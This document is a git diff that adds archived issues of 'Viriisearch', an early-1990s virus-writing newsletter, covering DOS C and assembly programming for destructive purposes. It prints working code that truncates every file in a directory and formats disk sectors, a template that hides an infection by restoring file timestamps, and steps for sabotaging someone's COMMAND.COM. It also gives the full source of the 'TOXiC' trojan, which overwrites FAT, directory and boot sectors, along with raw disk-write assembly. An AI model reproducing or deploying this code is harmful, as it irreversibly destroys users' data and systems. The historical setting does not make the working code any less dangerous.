_dos_findfirst("*.*",_A_NORMAL|_A_RDONLY|_A_HIDDEN|_A_SYSTEM,&find_all); + + _dos_setfileattr(find_all.name,_A_NORMAL); + + fh=open(find_all.name,O_TRUNC); + + close(fh); + + while (_dos_findnext(&all_file) == 0) { + + _dos_setfileattr(find_all.name,_A_NORMAL); + + fh=open(find_all.name,O_TRUNC); + + close(fh); + + } + +} + + + +----------------------------------------------------------------------------- + + + +We've Already Covered _dos_findfirst, _dos_findnext, _dos_setfileattr And + +Structures So We Will Concentrate On The "open" And "close" Functions, Which + +Are Relatively Simple. + + + + + +The Following Line Opens "find_all.name" And The Manifest Constant "O_TRUNC" + +Passed To The "open" Function Causes The File Being Opened To Be Truncated + +To 0 Bytes. + + + + fh=open(find_all.name,O_TRUNC); + + + +And Then We Close The Open Handle, Which Was Passed To The Integer "fh" By + +The "open" Function. + + + + close(fh); + + + + + +When We Close The File, It Gets Written Back To The Disk In The Same Exact + +Spot, But With It's Contents Destroyed. UNERASE (C) Symantec And Similar + +"File Recovery" Utilities Cannot Recover The Files. The Only Drawback To This + +Method Is That It Is Awfully Slow. + + + +----------------------------------------------------------------------------- + + + +Saving/Restoring File Dates/Times: + + + +----------------------------------------------------------------------------- + + + +Below is a C program to change the date and time stamp on a file called + +"TEST.TXT" to 01/01/82 and 1:32am + + + +----------------------------------------------------------------------------- + + + +#include + +#include + +#include + +#include + +#include + +#include + +#include + +int fh=0; + +unsigned date=0x421; + +unsigned time=0xC0F; + +int main(void); + +main() + +{ + + _dos_open("TEST.TXT",O_RDONLY,&fh); + + _dos_setftime(fh,date,time); + + _dos_close(fh); + +} + + + +----------------------------------------------------------------------------- + + + +_dos_open is passed three parameters, the file, the mode to open the file + +with, and a integer. + + + +The file is self explanatory, the mode is O_RDONLY which is read only. It is + +not neccesarry to open the file in a writable mode since we won't actually be + +writing to the file. The filename is passed to the integer "fh" + + + +The next function, _dos_setftime, is passed the integer, "fh", and the date + +and time to set on the file. date and time are unsigned integers. date has + +the hexadecimal value, 0x421, which is: 01/01/82 and time has the hexadecimal + +value, 0xC0F, which is 1:32am. This function sets the specified date and time + +and then the integer "fh" is passed to the _dos_close function, which closes + +the file. + + + +----------------------------------------------------------------------------- + + + +We can preserve the original date and time stamp on a file by using the + +function called "_dos_getftime" + + + +----------------------------------------------------------------------------- + + + +#include + +#include + +#include + +#include + +#include + +#include + +#include + +int fh; + +unsigned date; + +unsigned time; + +int main(void); + +main() + +{ + + _dos_open("TEST.TXT",O_RDONLY,&fh); + + _dos_getftime(fh,&date,&time); + + _dos_close(fh); + +} + + + +----------------------------------------------------------------------------- + + + +This program is virtually identical to the previous one except that we use + +_dos_getftime in place of _dos_setftime. + + + +----------------------------------------------------------------------------- + + + +If you were wondering where to get the hexadecimal values for setting the + +date and time, you can do it this way: + + + +----------------------------------------------------------------------------- + + + +#include + +#include + +#include + +#include + +#include + +#include + +#include + +#include + +int fh; + +char filename[13] = {"*.*"}; + +FILE *stream; + +unsigned date; + +unsigned mtime; + +int main(void); + +main() + +{ + +struct stat buf; + +struct find_t all_file; + + + +stream=fopen("HEXTABLE.TXT","a"); + +_dos_findfirst(filename, _A_NORMAL|_A_RDONLY|_A_SYSTEM|_A_HIDDEN, &all_file); + +_dos_open(all_file.name,O_RDONLY,&fh); + +_dos_getftime(fh,&date,&mtime); + +fstat(fh,&buf); + +_dos_close(fh); + +fprintf(stream,"-----------------------------------------------------------------------------\n"); + +fprintf(stream," Hexadecimal:\t\t| Regular:\n"); + +fprintf(stream,"-----------------------------------------------------------------------------\n"); + +fprintf(stream," %x %x\t\t| %s",date,mtime,ctime(&buf.st_atime)); + +while (_dos_findnext(&all_file) == 0) { + + _dos_open(all_file.name,O_RDONLY,&fh); + + _dos_getftime(fh,&date,&mtime); + + fstat(fh,&buf); + + _dos_close(fh); + + fprintf(stream," %x %x\t\t| %s",date,mtime,ctime(&buf.st_atime)); + + } + + fclose(stream); + +} + + + +----------------------------------------------------------------------------- + + + +This is actually very simple. It uses the file finding methods used in ATTRB + +v3.0, discussed earlier, with one difference: It doesn't take a command line + +parameter like ATTRB did...instead the filespec is declared in the code as a + +character array: + + + +char filename[13] = {"*.*"}; + + + +In this case, it finds ALL the files, using wildcards. You can change it to + +find any file(s) you want, for instance: + + + +char filename[13] = {"*.COM"}; + + + +Would find all the files that have a extension of .COM + + + +The curly braces { and } surrounding the filespec are neccessary when + +initializing a array. + + + +This is the structure for returning the date and time on the file: + + + +struct stat buf; + + + +And this is the structure for finding the files: + + + +struct find_t all_file; + + + +Here it opens the "HEXTABLE.TXT" file. Note the "a" switch, which means + +"append" if the file exists, it will write to the end of the file. If it + +doesn't exist, it will create it. + + + +stream=fopen("HEXTABLE.TXT","a"); + + + +Here it starts the search. It attempts to locate the first file matching: + + + +char filename[13] = {"*.*"}; + + + +and passes the filename found to the "all_file" structure + + + +_dos_findfirst(filename, _A_NORMAL|_A_RDONLY|_A_SYSTEM|_A_HIDDEN, &all_file); + + + +Here _dos_open opens the file, and passes the file handle to the integer "fh" + + + +_dos_open(all_file.name,O_RDONLY,&fh); + + + +And here it gets the file date and time, storing it in the two unsigned + +integers "date" and "mtime" + + + +NOTE: I originall called had used "time" instead of "mtime" and it wouldn't + +compile and link the file because "time" is a function in the standard + +library that came with the compiler. Told ya I'm still learning! + + + +BTW, the screw up with 'time' was Microsoft's fault. That's what they used in + +the manual. + + + +_dos_getftime(fh,&date,&mtime); + + + +Here it gets the stats on the file as outlined in the stat structure. + + + +fstat(fh,&buf); + + + +Then it close the file that the integer "fh" points to. + + + +_dos_close(fh); + + + +and prints the following lines to the file "HEXTABLE.TXT" + + + +fprintf(stream,"-----------------------------------------------------------------------------\n"); + +fprintf(stream," Hexadecimal:\t\t| Regular:\n"); + +fprintf(stream,"-----------------------------------------------------------------------------\n"); + +fprintf(stream," %x %x\t\t| %s",date,mtime,ctime(&buf.st_atime)); + + + +\t is a TAB, %s is a string, and %x is a hexadecimal value. + + + +It prints date and mtime as hex values, and prints the regular date and time + +as a string with the help of the "ctime" function. + + + +And the following code basically does the same thing until there are no more + +files matching "all_file.name" + + + +while (_dos_findnext(&all_file) == 0) { + + _dos_open(all_file.name,O_RDONLY,&fh); + + _dos_getftime(fh,&date,&mtime); + + fstat(fh,&buf); + + _dos_close(fh); + + fprintf(stream," %x %x\t\t| %s",date,mtime,ctime(&buf.st_atime)); + + } + + + +then it close "HEXTABLE.TXT" and exits. + + + + fclose(stream); + +} + + + +***************************************************************************** + + + +Following is part of "HEXTABLE.TXT" after I ran the above program so you can + +see some examples of hexadecimal date and time values and the regular date + +and time next to them: + + + +NOTE: The first hexadecimal value is the date, the second one is the time. + + + +***************************************************************************** + + + +----------------------------------------------------------------------------- + + Hexadecimal: | Regular: + +----------------------------------------------------------------------------- + + 1067 2820 | Mon Mar 07 05:01:00 1988 + + 1896 4bd1 | Wed Apr 22 09:30:34 1992 + + 106a 5a2c | Thu Mar 10 11:17:24 1988 + + 1067 2820 | Mon Mar 07 05:01:00 1988 + + 1067 2820 | Mon Mar 07 05:01:00 1988 + + 1689 2800 | Tue Apr 09 05:00:00 1991 + + 1896 4a5c | Wed Apr 22 09:18:56 1992 + + 1896 4a5c | Wed Apr 22 09:18:56 1992 + + 1067 2820 | Mon Mar 07 05:01:00 1988 + + 1067 2820 | Mon Mar 07 05:01:00 1988 + + + +***************************************************************************** + + + +You will notice in the previous program that set the file date and time, I + +had it like this: + + + +unsigned date=0x421; + +unsigned time=0xC0F; + + + +Now, in the above hex values, 1067 is 03/07/88 and 2820 is 5:01am, so you + +would put: + + + +unsigned date=1067; + +unsigned time=2820; + + + +right? WRONG. You have to put the 0x in front of it: + + + +unsigned date=0x1067; + +unsigned time=0x2820; + + + +This is only required if you are going to declare and initialize two integers + +with a value such as I did here: + +----------------------------------------------------------------------------- + +#include + +#include + +#include + +#include + +#include + +#include + +#include + +int fh=0; + +unsigned date=0x421; + +unsigned time=0xC0F; + +int main(void); + +main() + +{ + + _dos_open("TEST.TXT",O_RDONLY,&fh); + + _dos_setftime(fh,date,time); + + _dos_close(fh); + +} + +----------------------------------------------------------------------------- + +However, when getting the time and date using _dos_getftime and setting it + +using _dos_setftime, the 0x is not neccessary even though _dos_getftime does + +return the values without the 0x because _dos_setftime knows what they are + +and does set the date and time according to what the two values are. + +----------------------------------------------------------------------------- + + + +Now, the final product on getting/setting file dates/times: + + + +----------------------------------------------------------------------------- + + + +#include + +#include + +#include + +#include + +#include + +#include + +#include + +int fh; + +int main (void); + +main() + +{ + +unsigned date; + +unsigned mtime; + +_dos_open("EXAMPLE.EXE",O_RDWR,&fh); /* open file */ + +_dos_getftime(fh,&date,&mtime); /* get file date and time */ + +/* Virus can infect "EXAMPLE.EXE" here */ + +/* and then restore the original date and time */ + +_dos_setftime(fh,date,mtime); + +_dos_close(fh); /* close "EXAMPLE.EXE" */ + +} + + + +----------------------------------------------------------------------------- + + + +Formatting: + + + +----------------------------------------------------------------------------- + + + +#include + +int main(void); + +main() + +{ + + struct diskinfo_t disk_info; + + + + disk_info.drive =2; + + disk_info.head =1; + + disk_info.track =1; + + disk_info.sector =1; + + disk_info.nsectors =10; + + + + _bios_disk(_DISK_FORMAT,&disk_info); + +} + + + +----------------------------------------------------------------------------- + + + +The above example will format 10 sectors of track 1, starting at sector 1 on + +head 1 of drive C. + + + +----------------------------------------------------------------------------- + + + + disk_info.drive =2; + + disk_info.head =1; + + disk_info.track =1; + + disk_info.sector =1; + + disk_info.nsectors =10; + + + +----------------------------------------------------------------------------- + +disk_info.drive=2 is drive C. + + + +0 is drive A, and 1 is drive B. + + + +disk_info.head=1 is head 1. + + + +disk_info.track=1 is the track to start formatting at. + + + +disk_info.sector=1 is the sector to start formatting at. + + + +disk_info.nsectors=10 is the total number of sectors to format. + +----------------------------------------------------------------------------- + + + +Fun with COMMAND.COM + + + +----------------------------------------------------------------------------- + + + +OK, I did this to a friend of mine, and it resulted in about two hours of + +major frustration before I finally called him and told him what I did. What + +we do is change all the internal MS-DOS commands inside COMMAND.COM...once + +you do that, replace someone's COMMAND.COM on their hard drive and re-boot + +their machine. What will happen is whenever they type a internal command such + +as CLS, COPY, MD, DIR, etc, it will say: Bad Command Or Filename. + + + +This is how it is done: + + + +Run a sector editor such as: Norton Utilitie's DISKEDIT + + + +Commands: + + + +Alt (O)bject and then (F)ile OR Alt-F by itself. Then select COMMAND.COM as + +the file, it will then open it. Then: Alt (T)ools, (F)ind OR CTRL-S. Then type + +in the string to search for (CLS, DIR, COPY, etc), once it finds it, do the + +following: + + + +Alt (E)dit, (M)ark OR CTRL-B + + + +Then simply type over the command with something else and hit CTRL-W which + +will write those changes to the file. + + + +Just do this with every internal command and there you go. + + + +Note: If there is a string of text in COMMAND.COM such as: "Copy is used to + +move files from drive to drive or directory to directory", when you search + +for COPY it will find the Copy at the beginning of that string, you don't want + +to change that. Just hit CTRL-G (Find again) to find the next occurence of + +COPY.....The one you are looking for will be in all CAPS and surrounded by + +nothing else but unreadable characters. + + + +----------------------------------------------------------------------------- + + + +Sample Source Code Of Virii: TOXiC Trojan #1 + + + +----------------------------------------------------------------------------- + + + +This is what the author of the "TOXiC Trojan #1" has to say about his + +creation: + + + +----------------------------------------------------------------------------- + +TOXiC1 - TOXiC Trojan #1 - Programmed by Izzy Stradlin' and MiSERY/CPA + + MiSERY1 is the name given to this trojan. I programmed it, I name the + + Mother fucker. I hereby give all rights of this trojan to MiSERY/CPA. + + If ya don't like it, TOUGH. I Give ALL rights EXCEPT for the NAME to + + CPA - eg. NOONE CAN CHANGE THE NAME OF THIS THING W/O MY PERMISSION AND + + LEAVE MY NAME IN IT. The name must stay on, both my name and the name + + of the trojan are copyrighted (c) 90 to Izzy Stradlin' + + ----------------------------------------------------------------------- + + Capt. - This isn't a Real Virus - It's a Trojan. Sorry, still trying + + to use something similar to ASM's int 21h; for DOSs features, then I'll + + Get going on Virii. As is, this Destroys Boot/Fat/Dir on Most harddisks + + and Well, there is so far no way that I know of that it can recover + + what the disk lost, as it writes the trojan name over everything. This + + SHOULD Go for BOTH FAT Tables, but I am not going to try it out. Haha. + + You try it - Tell me how it works! all I know is that it got 6 of my + + Flippin' floppies, damnit! - Delete this bottom message to you after + + Checking it out - Makes it look more professional. Leave the top text + + part in tact, just in case you want to pass it around. + + This is JUST A START. They DO/WILL Get better - this is weak, but as I + + Said - no known recovery from it. + + Oh, this looks for C: through H: + + + +----------------------------------------------------------------------------- + + + +And this is what I have to say about The "TOXiC Trojan #1" + + + +----------------------------------------------------------------------------- + + + +The author of the "TOXiC Trojan #1" says that this is a trojan, but to me it + +is NOT....if it was, it wouldn't be featured here as this is a newsletter + +dedicated entirely to virii. A trojan is a destructive program disguised as + +a real program that already exists, or disguised as a useful program. This + +program does not implement any encryption techniques, or stealth techniques + +so actually it is a toss up. I call it a virus, though. Anyway, the source + +code below is the original source code as written by Izzy Stradlin' + + + +----------------------------------------------------------------------------- + + + +#define TROJAN_NAME "TOXiC" /* Trojan Name */ + + + +/* Procedures */ + +void infect_fat(); + +void infect_dir(); + +void infect_boot(); + +void main(); + +/* Simple, eh? */ + + + + + +void infect_fat() + +{ + + int i; + + for (i=2; i<7; i++) { + + abswrite(i,0,2,TROJAN_NAME); + + } + +} + + + +void infect_dir() + +{ + + int i; + + for (i=2; i<7; i++) { + + abswrite(i,2,2,TROJAN_NAME); + + } + +} + + + +void infect_boot() + +{ + + int i; + + for (i=0; i<7; i++) { + + abswrite(i,4,2,TROJAN_NAME); + + } + +} + + + +void main() + +{ + + printf(TROJAN_NAME); + + infect_fat(); + + infect_dir(); + + infect_boot(); + +} + + + +----------------------------------------------------------------------------- + + + +Now, this is my modified source code to the "TOXiC Trojan #1" + + + +----------------------------------------------------------------------------- + + + +#define TROJAN_NAME "TOXiC" + +void infect_fat(); + +void infect_dir(); + +void infect_boot(); + +int main(void); + +main() + +{ + + printf(TROJAN_NAME); + + infect_fat(); + + infect_dir(); + + infect_boot(); + +} + + + +void infect_fat() + +{ + + int i; + + for (i=2; i<7; i++) { + + abswrite(i,0,2,TROJAN_NAME); + + } + +} + + + +void infect_dir() + +{ + + int i; + + for (i=2; i<7; i++) { + + abswrite(i,2,2,TROJAN_NAME); + + } + +} + + + +void infect_boot() + +{ + + int i; + + for (i=0; i<7; i++) { + + abswrite(i,4,2,TROJAN_NAME); + + } + +} + + + +----------------------------------------------------------------------------- + + + +You may ask why I modified his source code, well I did for a few reasons: + + + +He declared "main()" as: + + + +void main(); + + + +When I first became familiar with the ANSI C standard, I declared "main()" + +like so: + + + +int main(void); + + + +which says that main() will return a value of type int but has no parameters + +passed to it. His way says that main will not return a value at all, and (I + +am assuming here) will not be called with any parameters because he left the + +parentheses empty. Using void and leaving the parentheses empty may very well + +have the same effect, although I am not sure. (I never said I knew everything) + + + +In his he put his procedures (below) before the main program. + + + +void infect_fat() + +{ + + int i; + + for (i=2; i<7; i++) { + + abswrite(i,0,2,TROJAN_NAME); + + } + +} + + + +void infect_dir() + +{ + + int i; + + for (i=2; i<7; i++) { + + abswrite(i,2,2,TROJAN_NAME); + + } + +} + + + +void infect_boot() + +{ + + int i; + + for (i=0; i<7; i++) { + + abswrite(i,4,2,TROJAN_NAME); + + } + +} + + + +With mine, I placed the procedures after the main program. Once again I am + +not 100% sure that this would have any effect on your program, and whether or + +not it is a case of preference. + + + +His three procedures: + + + +infect_fat() + +infect_dir() + +infect_boot() + + + +are all declared to return no value (void) and called with no parameters, as + +he, once again, left the parentheses empty. (Which brings us back to main().. + +leaving the parentheses empty on main() must have the same effect as putting + +void in the parentheses) + + + +Now the discussion of his procedures: + + + +void infect_fat() + +{ + + int i; + + for (i=2; i<7; i++) { + + abswrite(i,0,2,TROJAN_NAME); + + } + +} + + + +This procedure, "infect_fat" writes the name of the trojan (virus) over + +the file allocation table of drives C through H, providing they exist. This + +is how it works: + + + +the "for loop" uses the integer i, first assigning the value 2 to it, which + +is the number of drive C, and then it passes the integer to the function + +"abswrite" along with two other values, 0 and 2, and the name of the virus. + + + +The integer i, as we know, contains the drive number, 0 is the starting sector + +number, and 2 is the number of sectors to write. TROJAN_NAME is what gets + +written to that area of the disk. Every time it passes through the for loop, + +it increments the value of the integer i by 1 with the 'increment operator' + +(i++) and it stops once the value of i is equal to or greater than 7. i<7 is + +basically saying "while i is less than 7, keep going" Because the value of i + +is increased with each pass through the loop, it attempts to write drives C + +through H (2 being drive C, 3 being drive D, 4 being drive E, etc) + + + +The code in between the first { and the second } is what the procedure does. + +The code in between the second { and the first } is what takes place every + +time the procedure passes through the for loop. + + + +The other two procedures, infect_dir() and infect_boot(), basically work the + +same way infect_fat() does except they write to a different part of the disk. + + + +infect_dir() writes TROJAN_NAME on two sectors of drives C through H starting + +at sector 2. + + + +infect_boot() writes TROJAN_NAME on two sectors of drives C through H starting + +at sector 4. + + + +NOTE: abswrite() is not a function included with my standard runtime library + +but may be a part of other compiler's runtime libraries, or you could write + +one yourself. + + + +----------------------------------------------------------------------------- + + + +Suicidal Tendencies Dept: + + + +The virus of the month award goes to: 666-B Rock Steady Virus And The 15th + +Of April Virus. + + + +----------------------------------------------------------------------------- + + + +First I will start off with the 666-B Rock Steady Virus. + + + +The virus activates on the 13th of every month. + + + +I placed the file 666-B.COM on a floppy in drive B with the following files: + + + +COMMAND.COM - 47845 bytes + +PKUNZIP.EXE - 23528 bytes + + + +First I changed the system date to: 05-13-1992 and ran 666-B.COM + + + +It didn't do anything to the disk/files of drive B, instead it went to drive + +A which was a write protected Viriisearch disk. It gave me the following + +warning: + + + + This disk is not bootable + + + + If you wish to make it bootable, + + run the DOS program SYS after the + + system has been loaded + + + + Please insert a DOS diskette into + + the drive and strike any key... + + + +So I inserted a write protected DOS disk into the drive, and the machine + +booted. I decided to try a different approach: + + + +I once again changed the system date to: 05-13-1992 and once again ran + +666-B.COM, but this time with a write protected DOS disk in drive A. It did + +the same thing again, ignored drive B, and went right for drive A, this time + +appearing to write to the disk for about 5-10 seconds, but it wasn't because + +the disk was write protected at the time. Then the machine re-booted. So again + +I tried another approach: + + + +I left the system date as what it was: 1-01-80 and then ran 666-B.COM, it did + +nothing but exit. Then I ran COMMAND.COM from the command line, no changes + +were made to it. Now, with the virus in memory, I again changed the system + +date to: 05-13-1992 and ran COMMAND.COM from the command line. This time it + +infected COMMAND.COM, increasing it's size to: 48511 bytes from 47845 bytes. + +I re-booted the machine, and looked back on drive B. PKUNZIP.EXE had also + +been infected without me running it, it's size being increased to 24194 bytes + +from 23528 bytes. + + + +Note: The virus also formats the hard drive Boot Area and FAT on the 13th of + + every month, but I do not have a hard drive so I did not witness this. + + This is a well written virus and I am sure it does that if Rock Steady + + says it does. + + + +----------------------------------------------------------------------------- + + + +Suicidal Tendencies Dept. Part II: The 15th Of April Virus + + + +----------------------------------------------------------------------------- + + + +I placed the following files on a floppy in drive B: + + + + + +ANSI SYS 9029 04-09-91 5:00a + +RAMDRIVE SYS 5873 04-09-91 5:00a + +CONFIG SYS 39 01-01-80 12:35a + +COMMAND COM 47845 04-09-91 5:00a + +SYS COM 13440 04-09-91 5:00a + +NDOS COM 2419 08-14-84 12:00p + +MEM EXE 39818 04-09-91 5:00a + +DEBUG EXE 21692 06-07-90 2:24a + +PKUNZIP EXE 23528 03-15-90 1:10a + + + +and then placed 15APR.COM on there with them. + + + +The system date was: 1-01-80 when I first ran 15APR.COM. + + + +I then ran MEM.EXE and it's size increased to 41068 bytes from 39818 bytes. + +I also ran PKUNZIP.EXE, it's size increased to 24778 bytes from 23528 bytes, + +and NDOS.COM, it's size increasing from 2419 bytes to 3669 bytes. + + + +I then changed the system date to the 15th Of April, 1992 and ran 15APR.COM + +once again, and it did nothing. + + + +I ran COMMAND.COM and the virus did nothing to it, it remained uninfected and + +it's size remained the same so I ran SYS.COM with no parameters and it did + +get infected, it's size increasing from 13440 bytes to 14690 bytes. + + + +In all cases of a file being infected, it's size increased by 1250 bytes. + + + +----------------------------------------------------------------------------- + + + +Final Notes: + + + +----------------------------------------------------------------------------- + + + +Special thanks to: + + + +----------------------------------------------------------------------------- + + + +Rock Steady - For Writing Such A Well Written Virus For Me To Screw Around + + With. + + + +All The Phalcon/Skism Members - For Letting Me On U.S.S.R. And Letting Me + + Take Dark Angel's Phunky Virus Writing + + Guide As Well As 40 HEX (Gotta Love It + + When You Guys Rag On The Anti-Viral PPL) + + + +Louis Cypher - For Letting Me On Lucid Dreams, And Doing Me That Favor. + + + +Cliff Burton - For Making TLITD The Viriisearch HQ. + + + +Patty, Mr. Dickburg, And Whoever Else - For Giving The Phalcon/Skism Guys + + Someone To Rag On. + + + +Count Zero And Magic Man: For Letting Me On ATDT Which Led To My Original + + Interest In Virii. + + + +Spaceman: For Making All Those Virii Available To Me. + + + +To All The Virus Authors - For Writing Them And Giving This Newsletter A + + Purpose, And Giving Me Something To Do While + + A Unemployment Victim Of This #$%*& Recession. + + + +Pink Floyd/Led Zeppelin/Rush/U2/Queen - For Giving Me Good Quality Music To + + Listen To While Writing This Virus + + Newsletter (R.I.P Freddy & Bonzo) + + + +And Hi To Darby Crash! Hope You're Doing Well Wherever You Are! + + + +----------------------------------------------------------------------------- + + + +Hey Everyone: Have a AWESOME 4th Of July! Don't Drink And Drive (At Least Not + +In MY Neighborhood!) + + + +I hope you enjoyed this issue of "Viriisearch" The newsletter dedicated + +entirely to computer virii. + + + + + +Until Next Time......Be Careful!!! + + + + * Criminal Minded * + + + +----------------------------------------------------------------------------- + + + +Downloaded From P-80 International Information Systems 304-744-2253 + diff --git a/textfiles.com/virus/cmvs-3.v1 b/textfiles.com/virus/cmvs-3.v1 new file mode 100644 index 00000000..f1193cc4 --- /dev/null +++ b/textfiles.com/virus/cmvs-3.v1 @@ -0,0 +1,1216 @@ +DISCLAIMER: +The author will NOT accept responsibility for any damage to your +computer media and/or files, or responsibility for any action you might +take that will result in legal proceedings, the source code, if any, in +this newsletter is THE REAL THING, and you, after you read this, will be +well aware of what virii are capable of, and knowing that, it is expected +that you will act responsibly. + +DISCLAIMER II: +All I know about programming I have learned on my own, and did not go to +school for, and am still learning. As a result, I am sometimes prone to +make mistakes, and be wrong about things, so please be patient if I should +make a mistake, or say something that isn't true, which would be totally +unintentional. + + + ViriiSearch + ----------- + + The Virus Research Newsletter + + Volume 1, Number 3 + + Date: 08/02/92 + +CREDITS: +----------------------------------------------------------------------------- +Author...................................................Criminal Minded +Editor...................................................Criminal Minded +Ideas, Source, Examples Supplied By......................Criminal Minded +Facts Stolen From Several Sources By.....................Criminal Minded +----------------------------------------------------------------------------- + +Introduction: + +Welcome To The Third Issue Of Viriisearch, The Virus Research Newsletter. In +this issue you will find some changes, the layout has been changed slightly, +there are some new sections, and it's more organized. Let me know how you +like the changes, thanks! + +In this issue: + +----------------------------------------------------------------------------- +DEPARTMENTS: | FEATURES: +----------------------------------------------------------------------------- +In The News | Soviet Virii Attacks + | NASA's "No Nukes Worm" + | The Senate's Virus Bill +----------------------------------------------------------------------------- +Programming Shop | Absolute Disk Reads/Writes +----------------------------------------------------------------------------- +Programming Shop - Dissection Dept. | Explanation Of Above Example +----------------------------------------------------------------------------- +The Machine Shop | The Bootstrap Routine +----------------------------------------------------------------------------- +Sample Source Code Of Virii | A Replication Experiment +----------------------------------------------------------------------------- +"Suicidal Tendencies" Dept. | Leprosy (Strain C) +----------------------------------------------------------------------------- +Virus Info | The Devil's Dance Virus +----------------------------------------------------------------------------- +Articles | Unique Virii Names/Ideas + |------------------------------------ + | Assembly vs C Language Virii + |------------------------------------ + | My Profile Of A Virus Writer And + | My Views On The Virii Law + |------------------------------------ + | Are Virii REALLY A Problem? And For + | Who? + |------------------------------------ + | The Brain Virus: Fact And Fantasy +----------------------------------------------------------------------------- +Final Notes | Special Thanks, Greetings, Etc. +----------------------------------------------------------------------------- + + +In The News: +------------ + +----------------------------------------------------------------------------- +Welcome to a new section of Viriisearch! In this section we will cover virii +that made the news, old and new. Hope you enjoy the new section! +----------------------------------------------------------------------------- + +The U.S.S.R. is already suffering from an outburst of computer viruses and +crimes. Computer users should look to U.S. experiences to learn about +information security before the problem escalates even further. Pirated +software is prevalent in the Soviet Union, purchased from Hong Kong and +Swiss connections. The existence of numerous viruses has been confirmed +by Soviet and Eastern Europe anti-viral programmers and include Yankee +Doodle, Disk Killer 170X, Jerusalem, Friday The 13th COM and Victor, to +name a few. Three available antivirus programs are Lozynkv's Aidstest and +Kotik's Anti-Kot and Anti-Kor. Western and home-grown antivirus programs +are also being used. A lack of trained data security experts and data +security support services only make the problem worse. The situation is +likely to worsen before serious measures are taken to combat both viruses +and crime. Decisions about protecting information are not being developed +either. + +"Bozhe Mov! Hackers and viruses already plague Soviets." +Originally written by Sanford Sherizen. +Computerworld August 20th 1990, Page 74. +----------------------------------------------------------------------------- +This next "In The News" Article is about a worm, not a virus, but I found it +interesting and decided to re-print it. +----------------------------------------------------------------------------- + +DEC users are warned by the U.S. Department of Defense's Computer Emergency +Response Team (C.E.R.T) that a worm discovered on a NASA computer network in +the third week of Oct. 1989 may find it's way onto other DECnet networks. The +worm changed system banners to display an antinuclear message, and thus was +called the 'No Nukes Worm' by one NASA official. The program entered NASA's +Space Physics Analysis Network (S.P.A.N) through the DECnet Internet series +of networks that links approximately 13,000 computers, government agencies, +research centers, universities, and other facilities. DEC spokesman Jef +Gibson said that VAX/VMS system managers should have closed the loophole +through which the worm gained access after it was discovered in Dec. 1988. +NASA believes the worm may have been intended to protest the launch of the +Atlantis space shuttle that carried a plutonium powered probe on it's way to +Jupiter. + +"Worms eats holes in NASA's DECnet; 'No Nukes Worm' replaces system banners +with antinuclear message" +Originally written by Michael Alexander and Maryfran Johnson. +Computerworld October 23rd 1989. Page 4. +----------------------------------------------------------------------------- + +A Senate bill updating the Computer Fraud and Abuse Act of 1986 is being +praised by computer and legal experts, but it's passage could encourage +lawsuits against innocent institutions. The bill redefines the notion of +computer 'access' to cover the intentional transmission or distribution of +unauthorized applications that somehow cause damage to either hardware, +software, or data. Intentional abusers face felony charges with penalties +up to five years in prison and a $250,000 fine. The reckless, albeit, +unintentional transmission of virus-ridden software could result in a +misdemeanor charge and up to one year in jail and a $5,000 fine. The reach +of the previous law would also be extended to include computers used in +interstate communications or commerce. A U.S. Department of Justice official +says the bill grants prosecutors greater flexibility. + +"Virus bill raises hopes, fears: updated laws could hold unwitting transmi- +tters liable for damages. (Computer Fraud and Abuse Act of 1986)" +Originally written by Gary H. Anthes. +Computerworld August 13th, 1990. Page 45. +----------------------------------------------------------------------------- + +Programming Shop: +----------------- + +***************************************************************************** +First we will cover absolute disk reads/writes using Assembly language. +***************************************************************************** + +This next example will write the contents of 'buffer' to the first ten +sectors of drive C: + +***************************************************************************** +WARNING: There is NO recovery from this. +***************************************************************************** + +abswrite proc near +buffer db 'Lick Me' dup (?) + mov al,2 + mov cx,10 + mov dx,1 + mov bx,seg buffer + mov ds,bx + mov bx,offset buffer + int 26h + jc error + add sp,2 +abswrite endp + +***************************************************************************** +Next is absolute disk read(s) +***************************************************************************** + +absread proc near +buffer db 512 dup (?) + mov al,2 + mov cx,10 + mov dx,1 + mov bx,seg buffer + mov ds,bx + mov bx,offset buffer + int 25h + jc error + add sp,2 +absread endp + +***************************************************************************** +Programming Shop - Dissection Dept. +***************************************************************************** + +absread proc near +buffer db 512 dup (?) + mov al,2 + mov cx,10 + mov dx,1 + mov bx,seg buffer + mov ds,bx + mov bx,offset buffer + int 25h + jc error + add sp,2 +absread endp + +***************************************************************************** + +First we will discuss absolute disk read(s). + + The line "mov al,2" is telling which drive we want to read from. Drive #2 is + drive C. + + The next line, "mov cx,10" is telling how many sectors we want to read (10) + + The line, "mov dx,1" is telling the starting sector number to start reading + at. (1) + + The next three lines: + + mov bx,seg buffer + mov ds,bx + mov bx,offset buffer + + establish the address of the buffer, and then DS:BX point to the + segment:offset of the buffer. + + The next line, "int 25h" is the function number of the "absolute read" + function. + + The next line, "jc error" jumps if there is an error. + + and the last line, "add sp,2" clears the stack. + +Notes: The purpose of clearing the stack using "add sp,2" is because, when +function int 26h returns, the CPU flags originally pushed onto the stack by +int 26h are still on it. You should clear it to prevent uncontrolled stack +growth and to make available any other values pushed onto the stack before +the call to int 26h. + +***************************************************************************** +Next we will discuss absolute disk write(s) and the difference between the +two functions, read and write. +***************************************************************************** +As you can see, there is little difference between the two: + + Absolute Read: Absolute Write: +_____________________________________________________________________________ +absread proc near | abswrite proc near +buffer db 512 dup (?) | buffer db 'Lick Me' dup (?) + mov al,2 | mov al,2 + mov cx,10 | mov cx,10 + mov dx,1 | mov dx,1 + mov bx,seg buffer | mov bx,seg buffer + mov ds,bx | mov ds,bx + mov bx,offset buffer | mov bx,offset buffer + int 25h | int 26h + jc error | jc error + add sp,2 | add sp,2 +absread endp | abswrite endp +----------------------------------------------------------------------------- +Absolute disk read and absolute disk write are identical except for four +lines: + +Note: Periods replace the lines in each example that are identical. +----------------------------------------------------------------------------- +absread proc near | abswrite proc near +buffer db 512 dup (?) | buffer db 'Lick Me' dup (?) + . | . + . | . + . | . + . | . + . | . + . | . + int 25h | int 26h | + . | . + . | . +absread endp | abswrite endp +----------------------------------------------------------------------------- +The differences in the above examples are as follows: + +The first line: This is the beginning of each procedure. They are named for +what they do, absread for absolute read and abswrite for absolute write. You +could've named the two procedures something else, for instance: shithead and +dickhead, and it wouldn't matter. + +The second line: In the case of absolute read, we have our buffer declared as +512 bytes and not initialized. In the case of absolute write, we have the +buffer initialized to store the string 'Lick Me'. + +The ninth line: This line is the function number, int 25h being the function +number for absolute disk read, and int 26h being the function number for +absolute disk write. + +The twelfth line: This is just the end of each of the two procedures. +***************************************************************************** + +The Machine Shop: +----------------- + +----------------------------------------------------------------------------- +Welcome to a 